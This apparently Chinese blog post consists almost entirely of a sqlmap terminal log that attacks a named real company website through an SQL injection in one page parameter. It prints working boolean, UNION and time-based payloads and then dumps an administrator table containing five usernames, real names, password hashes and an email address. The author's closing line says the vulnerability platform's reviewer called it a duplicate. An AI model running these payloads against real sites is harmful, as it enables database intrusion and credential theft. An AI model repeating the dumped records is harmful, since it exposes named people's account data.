root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_admin -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:01:02

[21:01:02] [INFO] resuming back-end DBMS 'mysql' 
[21:01:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:01:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:01:02] [INFO] fetching columns for table 'dede_admin' in database 'xinhuapinmei'
[21:01:03] [WARNING] reflective value(s) found and filtering out
[21:01:03] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:01:03] [WARNING] the SQL query provided does not return any output
[21:01:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:01:03] [WARNING] unable to retrieve column names for table 'dede_admin' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] y
[21:01:05] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[21:01:05] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 
[21:01:06] [WARNING] running in a single-thread mode. This could take a while.
[21:01:06] [INFO] retrieved: id                                                
[21:01:08] [INFO] retrieved: userid                                            
[21:01:13] [INFO] retrieved: email                                             
[21:01:19] [INFO] tried 39/2496 items (2%)
[21:01:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:05:11] [INFO] retrieved: pwd                                               
[21:05:43] [INFO] retrieved: uname                                             
[21:05:45] [INFO] tried 610/2496 items (24%)
[21:06:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:07:51] [INFO] tried 872/2496 items (35%)^C

[21:07:52] [WARNING] user aborted during column existence check. sqlmap will display partial output
                                                                               
Database: xinhuapinmei
Table: dede_admin
[5 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| email  | non-numeric |
| id     | numeric     |
| pwd    | non-numeric |
| uname  | non-numeric |
| userid | non-numeric |
+--------+-------------+

[21:07:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:07:54

root@root:~# root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dump -T dede_admin -C "uname,pwd" -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:08:21

[21:08:21] [INFO] resuming back-end DBMS 'mysql' 
[21:08:21] [INFO] testing connection to the target URL
[21:08:52] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:08:52] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:08:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:08:53] [INFO] fetching columns 'pwd, uname' for table 'dede_admin' in database 'xinhuapinmei'
[21:08:54] [WARNING] reflective value(s) found and filtering out
[21:08:54] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:08:54] [WARNING] the SQL query provided does not return any output
[21:08:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:08:54] [WARNING] unable to retrieve column names for table 'dede_admin' in database 'xinhuapinmei'
[21:08:54] [INFO] fetching entries of column(s) 'email, id, pwd, uname, userid' for table 'dede_admin' in database 'xinhuapinmei'
[21:08:55] [WARNING] the SQL query provided does not return any output
[21:08:55] [INFO] fetching number of column(s) 'email, id, pwd, uname, userid' entries for table 'dede_admin' in database 'xinhuapinmei'
[21:08:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:08:55] [INFO] retrieved: 5
[21:08:57] [INFO] retrieved: 
[21:08:59] [WARNING] time-based comparison requires larger statistical model, please wait............
[21:09:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[21:10:33] [INFO] adjusting time delay to 2 seconds due to good response times
[21:10:33] [ERROR] invalid character detected. retrying..
[21:10:33] [WARNING] increasing time delay to 3 seconds 
[21:10:45] [ERROR] invalid character detected. retrying..
[21:10:45] [WARNING] increasing time delay to 4 seconds 

[21:10:56] [ERROR] invalid character detected. retrying..
[21:10:56] [WARNING] increasing time delay to 5 seconds 
[21:11:09] [ERROR] invalid character detected. retrying..
[21:11:09] [WARNING] increasing time delay to 6 seconds 

[21:11:11] [INFO] retrieved: 1
[21:11:16] [INFO] retrieved: 31a2819
[21:12:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
8c541f3c9f0f8
[21:12:44] [INFO] retrieved: admin
[21:12:59] [INFO] retrieved: admin
[21:13:20] [INFO] retrieved: 
[21:13:22] [INFO] retrieved: 
[21:13:24] [INFO] retrieved: 2
[21:13:30] [INFO] retrieved: 66f8880a7
[21:14:24] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
7d1077fe505
[21:14:56] [INFO] retrieved: 汤蕾
[21:16:12] [INFO] retrieved: tanglei
[21:16:32] [INFO] retrieved: 
[21:16:34] [INFO] retrieved: A
[21:17:22] [INFO] retrieved: 3
[21:17:26] [INFO] retrieved: 66f8880a77d1077fe505
[21:18:28] [INFO] retrieved: 钱晓乐
[21:20:25] [INFO] retrieved: qianxiaole
[21:20:52] [INFO] retrieved: 
[21:20:54] [INFO] retrieved: 
[21:20:57] [INFO] retrieved: 4
[21:21:01] [INFO] retrieved: 66f888
[21:21:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
0a77d1077fe505
[21:22:24] [INFO] retrieved: 刘惠
[21:24:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
迪
[21:24:41] [INFO] retrieved: liuhuidi
[21:25:10] [INFO] retrieved: liuyichi@gmail.com
[21:25:57] [INFO] retrieved: 5
[21:26:02] [INFO] retrieved: c2713e3c413414e38390
[21:26:51] [INFO] retrieved: 张科
[21:28:03] [INFO] retrieved: zhangke
[21:28:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[21:28:53] [INFO] analyzing table dump for possible password hashes
Database: xinhuapinmei
Table: dede_admin
[5 entries]
+----+------------+----------------------+-------+--------------------+
| id | userid     | pwd                  | uname | email              |
+----+------------+----------------------+-------+--------------------+
| 1  | admin      | 31a28198c541f3c9f0f8 | admin | <blank>            |
| 2  | tanglei    | 66f8880a77d1077fe505 | 汤蕾    | <blank>            |
| 3  | qianxiaole | 66f8880a77d1077fe505 | 钱晓乐   | A                  |
| 4  | liuhuidi   | 66f8880a77d1077fe505 | 刘惠迪   | <blank>            |
| 5  | zhangke    | c2713e3c413414e38390 | 张科    | liuyichi@gmail.com |
+----+------------+----------------------+-------+--------------------+

[21:28:53] [INFO] table 'xinhuapinmei.dede_admin' dumped to CSV file '/usr/share/sqlmap/output/www.digitalchina.com.hk/dump/xinhuapinmei/dede_admin.csv'
[21:28:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:28:53

root@root:~# 

什么也不说说了 ,乌云审核狗说有了

本文标签:

版权声明:若无特殊注明,本文皆为《w0ai1uo》原创,转载请保留文章出处。

本文链接:神州数码测试笔记 - https://www.w0ai1uo.org/121.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
随机播放